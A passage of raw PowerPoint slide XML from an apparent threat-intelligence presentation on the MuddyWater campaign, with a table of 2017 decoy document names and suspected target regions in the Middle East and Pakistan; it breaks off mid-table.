              <a:rPr lang="ru" sz="1350">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Appendix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="135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0" y="35325"/>
            <a:ext cx="2698925" cy="5065773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741300" y="84800"/>
            <a:ext cx="6358800" cy="14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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MuddyWater in the Middle East</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attackers behind MuddyWater have been active throughout 2017, with targets across the Middle East and surrounding areas, examples of the decoy documents observed is given in Table 1.</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Of course, being named in a decoy document doesn’t mean any of these organizations have been attacked themselves or are involved in the attacks: the MuddyWater actors are abusing the trust these organizations’ names and/or logos command for their malicious purposes.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="117" name="Google Shape;117;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2766038" y="1568565"/>
          <a:ext cx="6309325" cy="3520350"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{E93C387C-82AE-4516-9D41-3D8AFD676D0F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="15328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363525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="304850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Month</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ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>File Name or Decoy Document Theme</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ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Suspected Target Region</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Nov 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The NSA</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Telenor.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Unknown</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pakistan</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="512850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Oct 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Circulars.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dollar.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pakistan Federal Investigation Agency</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CV of Middle Eastern Civil Servant</a:t>
                      </a:r>
                      <a:endParaRPr sz="600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Turkey</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pakistan</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sep 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq National Intelligence Service</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Kaspersky Security solution 2017.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="304850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aug 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Arab Emirate سری.docm</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq Commission of Integrity</a:t>
                      </a:r>
                      <a:endParaRPr sz="600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Arab Emirates</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Jul 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Requirements of the Sago.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CommIT-Document.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Confidential letters.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Saudi Arabia</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Arab Emirates</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pakistan</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Jun 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq Kurdistan Regional Government</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RFP_VOIP.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
